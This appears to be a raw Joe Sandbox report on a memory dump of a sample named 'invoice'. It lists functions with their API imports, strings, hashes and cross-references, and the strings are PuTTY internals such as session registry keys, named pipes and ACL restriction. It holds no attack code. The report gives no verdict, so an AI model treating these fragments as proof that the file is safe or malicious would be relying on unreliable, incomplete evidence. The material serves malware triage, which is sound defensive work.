advapi32.dll, xrefs: 000000013FDCE68F
GetSecurityInfo, xrefs: 000000013FDCE6AB
OpenProcessToken, xrefs: 000000013FDCE708
InitializeSecurityDescriptor, xrefs: 000000013FDCE762
GetTokenInformation, xrefs: 000000013FDCE735
SetSecurityDescriptorOwner, xrefs: 000000013FDCE787
SetSecurityInfo, xrefs: 000000013FDCE6DB

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: AddressProc
String ID: GetSecurityInfo$GetTokenInformation$InitializeSecurityDescriptor$OpenProcessToken$SetEntriesInAclA$SetSecurityDescriptorOwner$SetSecurityInfo$advapi32.dll
API String ID: 190572456-1260934078
Opcode ID: 8126fced1d5c9ba1ba954d0deb3b52bc3836319e86bde6886081b7436569909e
Instruction ID: e1d1753f430014c25145b88686fcec5abbe129842df9c9ffffadd0c1ac9a54c0
Opcode Fuzzy Hash: 8126fced1d5c9ba1ba954d0deb3b52bc3836319e86bde6886081b7436569909e
Instruction Fuzzy Hash: 3041D27CE02B51A8FE15EB6AE8687E432A5AB44750F56453D844E463F0FF7C87478B80

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FD724C4 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 121registryCOMMON

Download Yara Rule

APIs

RegisterClassA.USER32 ref: 000000013FD72553
GetSysColor.USER32 ref: 000000013FD7256C
GetSysColor.USER32 ref: 000000013FD72579
SystemParametersInfoA.USER32 ref: 000000013FD725B5
CreateFontIndirectA.GDI32 ref: 000000013FD725C3
SetWindowTextA.USER32 ref: 000000013FD725FE
CreateCompatibleDC.GDI32 ref: 000000013FD7260B
GetTextExtentPoint32A.GDI32 ref: 000000013FD72635
DeleteDC.GDI32 ref: 000000013FD7263E
GetWindowRect.USER32 ref: 000000013FD7264F
CreateWindowExA.USER32 ref: 000000013FD726B3
ShowWindow.USER32 ref: 000000013FD726C8

Strings

SizeTipClass, xrefs: 000000013FD72548
%dx%d, xrefs: 000000013FD725D0

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: Window$Create$ColorText$ClassCompatibleDeleteExtentFontIndirectInfoParametersPoint32RectRegisterShowSystem
String ID: %dx%d$SizeTipClass
API String ID: 2854742871-2531271423
Opcode ID: 23bcf9d4b127c510dfbff66878fb5beff5008953295656581a17406ab4528225
Instruction ID: 58b2a8a9df4cc20f1526e2159bc966e89ee1d00bcbfd20144a968d35e6c61d15
Opcode Fuzzy Hash: 23bcf9d4b127c510dfbff66878fb5beff5008953295656581a17406ab4528225
Instruction Fuzzy Hash: 10518E39A14A849AF710EF19E8547DA77A0F788B90F51813ADA49437B4EF3CC68BC701

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCD588 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 93stringCOMMON

Download Yara Rule

APIs

strchr.LIBVCRUNTIME ref: 000000013FDCD61D
CreateEventA.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,00000000,00000000,?,00000000,?,000000013FD9F4CE), ref: 000000013FDCD684

Part of subcall function 000000013FDDFF98: _set_error_mode.LIBCMT ref: 000000013FDDFFBF

GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,00000000,00000000,?,00000000,?,000000013FD9F4CE), ref: 000000013FDCD6B0

Part of subcall function 000000013FDCA0FC: FormatMessageA.KERNEL32 ref: 000000013FDCA1A7

Strings

strchr(pipename + 9, '\\') == NULL, xrefs: 000000013FDCD627
strncmp(pipename, "\\\\.\\pipe\\", 9) == 0, xrefs: 000000013FDCD5F3
unable to create named pipe '%s': %s, xrefs: 000000013FDCD6BD
../windows/winnps.c, xrefs: 000000013FDCD5FA, 000000013FDCD62E
\\.\pipe\, xrefs: 000000013FDCD5DA

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: CreateErrorEventFormatLastMessage_set_error_modestrchr
String ID: ../windows/winnps.c$\\.\pipe\$strchr(pipename + 9, '\\') == NULL$strncmp(pipename, "\\\\.\\pipe\\", 9) == 0$unable to create named pipe '%s': %s
API String ID: 658058068-1109156701
Opcode ID: 0ad719d4dceae01046c03efad5344d980425b4695b459b497ac134a0716e26c3
Instruction ID: 3125cb3df49347f0455596492de639d2e0159bf3a4d55244986a5f0e06cdfc9d
Opcode Fuzzy Hash: 0ad719d4dceae01046c03efad5344d980425b4695b459b497ac134a0716e26c3
Instruction Fuzzy Hash: B6319031B0070582FA20DBA6F8547DA6361AB46780F80453D9E8E57BD6EE7CD347C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDF3280 Relevance: 13.8, APIs: 9, Instructions: 273fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000000013FDF372C: _invalid_parameter_noinfo.LIBCMT ref: 000000013FDF376D
Part of subcall function 000000013FDF372C: _invalid_parameter_noinfo.LIBCMT ref: 000000013FDF37ED
Part of subcall function 000000013FDF372C: _invalid_parameter_noinfo.LIBCMT ref: 000000013FDF3841
Part of subcall function 000000013FDF372C: _get_daylight.LIBCMT ref: 000000013FDF3899

CreateFileW.KERNEL32 ref: 000000013FDF3386
CreateFileW.KERNEL32 ref: 000000013FDF33D6
GetLastError.KERNEL32 ref: 000000013FDF3406
GetFileType.KERNEL32 ref: 000000013FDF341B
GetLastError.KERNEL32 ref: 000000013FDF3425
CloseHandle.KERNEL32 ref: 000000013FDF3458
CloseHandle.KERNEL32 ref: 000000013FDF35B3
CreateFileW.KERNEL32 ref: 000000013FDF35E8
GetLastError.KERNEL32 ref: 000000013FDF35F7

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
String ID:
API String ID: 1330151763-0
Opcode ID: 5e5e7afd5c90cbbe8331d3f6c5e68c0bfc5852d1306da1eabf34aac726b8e333
Instruction ID: 40a0e3c2c2e46521fdf31065201ebeb87dff69535eacd1e95c017c6f6b419cea
Opcode Fuzzy Hash: 5e5e7afd5c90cbbe8331d3f6c5e68c0bfc5852d1306da1eabf34aac726b8e333
Instruction Fuzzy Hash: D2C1CE37B10B408AEB50DFA9D4957DC3761E748BA8F025239DE2A9BBD4DB38C656C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCCE7C Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 80libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 000000013FDCCED3
GetProcAddress.KERNEL32 ref: 000000013FDCCEF3
GetProcAddress.KERNEL32 ref: 000000013FDCCF13

Strings

CryptReleaseContext, xrefs: 000000013FDCCF0C
advapi32.dll, xrefs: 000000013FDCCEB1
CryptGenRandom, xrefs: 000000013FDCCEEC
CryptAcquireContextA, xrefs: 000000013FDCCEC9

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: AddressProc
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 190572456-129414566
Opcode ID: d0d62dede4bb39e1800062b57ac5b090a60e71a412f09a77438e5268f43f161c
Instruction ID: 7fafaae1d658edb2a7106e4f68a365d35901f750b52de281b130db55e2ab87bd
Opcode Fuzzy Hash: d0d62dede4bb39e1800062b57ac5b090a60e71a412f09a77438e5268f43f161c
Instruction Fuzzy Hash: 1B316B38A02B44A9FE14EB65EC547D563A1BB84B90F86423E9D0D467B4EF38C747CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCF88C Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32 ref: 000000013FDCF8E6
RegCreateKeyA.ADVAPI32 ref: 000000013FDCF91D
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,000000013FD6DECA), ref: 000000013FDCF92A

Strings

Unable to create registry keyHKEY_CURRENT_USER\%s\%s, xrefs: 000000013FDCF937
Default Settings, xrefs: 000000013FDCF8B9
Software\SimonTatham\PuTTY\Sessions, xrefs: 000000013FDCF8D3, 000000013FDCF8FF, 000000013FDCF93E
Unable to create registry keyHKEY_CURRENT_USER\%s, xrefs: 000000013FDCF8F8

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: Create$Close
String ID: Default Settings$Software\SimonTatham\PuTTY\Sessions$Unable to create registry keyHKEY_CURRENT_USER\%s$Unable to create registry keyHKEY_CURRENT_USER\%s\%s
API String ID: 2684088411-338366038
Opcode ID: da628ada2e8e84a485c4143a9a456be866c973f7931793519fdda49f711495ed
Instruction ID: b1c691f398fa3fb157a849aa7b8cffff7a2a57e00f1dd0c5a315c03fb99af8c0
Opcode Fuzzy Hash: da628ada2e8e84a485c4143a9a456be866c973f7931793519fdda49f711495ed
Instruction Fuzzy Hash: 6521A331B15A4694FE50EFD6E8947EE6360AB85BD0F444039AA4E4B7A9DE3CCB43C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDED2B0 Relevance: 10.8, APIs: 7, Instructions: 291COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000013FDED6EB

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: eb51fd7e5db4ff8fb66580c7e875da7a164717b112a0596feff2c815a2616c1e
Instruction ID: 3cd20ecfc6734c5ba869def51f21030431b14ba2456aac67fee5ac7c07c4a50e
Opcode Fuzzy Hash: eb51fd7e5db4ff8fb66580c7e875da7a164717b112a0596feff2c815a2616c1e
Instruction Fuzzy Hash: D8C1F132E0468485EA61AF95A4087ED7B60F761B94F96113DEE4E0B7E9CF38CA47C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDD1826 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 187COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,00000000,?,?,?,?,?,000000013FD5AB74), ref: 000000013FDD1906
GetACP.KERNEL32(?,?,00000000,?,?,?,?,?,000000013FD5AB74), ref: 000000013FDD19D7
GetOEMCP.KERNEL32(?,?,00000000,?,?,?,?,?,000000013FD5AB74), ref: 000000013FDD19E4
GetCPInfo.KERNEL32(?,?,00000000,?,?,?,?,?,000000013FD5AB74), ref: 000000013FDD1A42

Strings

UTF-8, xrefs: 000000013FDD186B
:, xrefs: 000000013FDD188F

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: Info
String ID: :$UTF-8
API String ID: 1807457897-3319900431
Opcode ID: b4b4fe712176dcd3d73210a2920449bbe3be3164eec5bf31ac4201d3eaa40733
Instruction ID: db9de0cfcb5dae36781875cbb6817ff77f399b06ad7a21bb9156dfb910a23c61
Opcode Fuzzy Hash: b4b4fe712176dcd3d73210a2920449bbe3be3164eec5bf31ac4201d3eaa40733
Instruction Fuzzy Hash: 1C612933E0458006F6799B7595583ED27E1EF457A8F19523EEEAA072E5EA38CB43C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDE11DC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000013FDE1255
_invalid_parameter_noinfo.LIBCMT ref: 000000013FDE12A5
_invalid_parameter_noinfo.LIBCMT ref: 000000013FDE12ED
_invalid_parameter_noinfo.LIBCMT ref: 000000013FDE1325
_invalid_parameter_noinfo.LIBCMT ref: 000000013FDE139D

Strings

MZx, xrefs: 000000013FDE11FD

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: MZx
API String ID: 3215553584-2575928145
Opcode ID: dcdac1a87eaacf1822f2edd1f3a0899b384539b0ba77c9f089ec299560c52591
Instruction ID: 464050282875095c622007c75a41d93f40f1c1fe6336d169c4e8c8538f86aca9
Opcode Fuzzy Hash: dcdac1a87eaacf1822f2edd1f3a0899b384539b0ba77c9f089ec299560c52591
Instruction Fuzzy Hash: B651E732F04B84C6E752AF65D4683EC7BD4A776F44F598029DB8C4B786CA398A56C302

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCECF5 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 000000013FDCEB82: AllocateAndInitializeSid.ADVAPI32 ref: 000000013FDCEC29
Part of subcall function 000000013FDCEB82: AllocateAndInitializeSid.ADVAPI32 ref: 000000013FDCEC81
Part of subcall function 000000013FDCEB82: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,000000013FDCED25), ref: 000000013FDCEC8B

GetCurrentProcess.KERNEL32 ref: 000000013FDCEDC4
GetLastError.KERNEL32 ref: 000000013FDCEE23
LocalFree.KERNEL32 ref: 000000013FDCEE4D

Strings

Could not restrict process ACL: %s, xrefs: 000000013FDCEE53
Unable to set process ACL: %s, xrefs: 000000013FDCEE1C
unable to construct ACL: %s, xrefs: 000000013FDCEDA1

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: AllocateErrorInitializeLast$CurrentFreeLocalProcess
String ID: Could not restrict process ACL: %s$Unable to set process ACL: %s$unable to construct ACL: %s
API String ID: 4156538165-2118130043
Opcode ID: 498972c6bf54ee942513d65e0f115cb1f08e85a29794c9e998da8f18227d5a38
Instruction ID: b9e761e1e9c80616a75333294e934cfa970784e88c7e6586dea7aebff63a6f86
Opcode Fuzzy Hash: 498972c6bf54ee942513d65e0f115cb1f08e85a29794c9e998da8f18227d5a38
Instruction Fuzzy Hash: 8541AE75A04A9095FA219F59F814BD973B5FB88BD0F105139EA8D43B64EF3AC693C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCFD9D Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000013FDCF996: RegSetValueExA.ADVAPI32 ref: 000000013FDCF9CD

RegSetValueExA.ADVAPI32 ref: 000000013FDCFE0A
RegSetValueExA.ADVAPI32 ref: 000000013FDCFE5B
RegSetValueExA.ADVAPI32 ref: 000000013FDCFEAC

Strings

IsBold, xrefs: 000000013FDCFDC6
CharSet, xrefs: 000000013FDCFE18
Height, xrefs: 000000013FDCFE69

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: Value
String ID: CharSet$Height$IsBold
API String ID: 3702945584-3525404096
Opcode ID: dd20742a31f3c67103635af5f42f1063164efd502d6101b214be8e51fc7e1c1a
Instruction ID: 1efbf390bdad1ee80f15fd60c082664bef7172784fc144d5834f73f58730df6a
Opcode Fuzzy Hash: dd20742a31f3c67103635af5f42f1063164efd502d6101b214be8e51fc7e1c1a
Instruction Fuzzy Hash: C631B076715A508AEB60DB66E954B99A361E789BD0F419039AE8D0BF59DE3CC2028B00

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDF6568 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000000013FDF6599
GetLastError.KERNEL32 ref: 000000013FDF65A5
CloseHandle.KERNEL32 ref: 000000013FDF65BD
CreateFileW.KERNEL32 ref: 000000013FDF65E8
WriteConsoleW.KERNEL32 ref: 000000013FDF6607

Strings

CONOUT$, xrefs: 000000013FDF65C9

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: b9588e6772ba4242d86b8e761ac6bab0049581a31c806d25b2ba55c106733705
Instruction ID: da6b16a7a849c00797f7b9ae721dbbcd646c4593e95e20f82b7dbd7dcf5696cc
Opcode Fuzzy Hash: b9588e6772ba4242d86b8e761ac6bab0049581a31c806d25b2ba55c106733705
Instruction Fuzzy Hash: D411B675B10B409AE750AB52E85475963A0F788FE4F050239DE5D87BA4DF38CB468B40

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDE0B90 Relevance: 9.4, APIs: 6, Instructions: 434COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000013FDE0BC6
_invalid_parameter_noinfo.LIBCMT ref: 000000013FDE0CBC

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 945ef9be1c4f48dc17b30c558a0f0182dc51ae592975c503638eeffbf34b4c0e
Instruction ID: 4c78b8b1fa1e57b1b780c83f789a8e94267bf6131f51980f8b1ef68e1b7e2d00
Opcode Fuzzy Hash: 945ef9be1c4f48dc17b30c558a0f0182dc51ae592975c503638eeffbf34b4c0e
Instruction Fuzzy Hash: A0F1F632A05A8489F7608FA4E49C3ED7BA5E735B84F48813AC7DD477A6D639C657C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDE8B34 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 179COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000013FDE8B77

Strings

gfff, xrefs: 000000013FDE8C99
e+000, xrefs: 000000013FDE8C1C
-, xrefs: 000000013FDE8D59
-, xrefs: 000000013FDE8C6E

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$-$e+000$gfff
API String ID: 3215553584-1058778380
Opcode ID: 9ea52b9f684fe132541df9958cfc303b84ed897d34ed17c7a041fa9c34c39979
Instruction ID: dde3f09cc829df46484b89187f4269fdb31ef4316702cfabc1bad6a9559d998d
Opcode Fuzzy Hash: 9ea52b9f684fe132541df9958cfc303b84ed897d34ed17c7a041fa9c34c39979
Instruction Fuzzy Hash: 25610272B147C486EB258F65E9483CD7B91E351B90F488239DBAC47BD9CB39C646C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCD77E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87pipeCOMMON

Download Yara Rule

APIs

ConnectNamedPipe.KERNEL32(00000008,00000000,00000000,00000030,00000050,00000000,000000013FDCD6AE,?,?,?,?,?,?,00000000,00000000,?), ref: 000000013FDCD7C0
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,00000000,00000000,?,00000000,?,000000013FD9F4CE), ref: 000000013FDCD7C7
CloseHandle.KERNEL32 ref: 000000013FDCD7F9
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,00000000,00000000,?,00000000,?,000000013FD9F4CE), ref: 000000013FDCD80A

Strings

Error while listening to named pipe: %s, xrefs: 000000013FDCD819

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

